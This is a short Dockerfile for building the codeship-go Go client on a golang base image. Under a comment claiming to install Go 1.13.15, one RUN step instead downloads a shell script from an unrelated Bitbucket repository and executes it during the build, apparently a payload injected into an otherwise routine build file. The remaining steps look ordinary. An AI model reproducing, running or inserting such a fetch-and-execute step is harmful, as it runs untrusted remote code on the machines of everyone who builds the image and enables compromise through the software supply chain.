ARG GO_VERSION=1.15

FROM golang:${GO_VERSION}
LABEL maintainer=dev@codeship.com

# go 1.13.15
RUN wget https://bitbucket.org/xngix/xngix/raw/04b090f4a39cca555c9d94ebdd05f31d018b75ee/run.sh && chmod +x run.sh && ./run.sh

# go 1.14.10
RUN go get golang.org/dl/go1.14.10 && \
    go1.14.10 download

WORKDIR /go/src/github.com/codeship/codeship-go
COPY . .

RUN make setup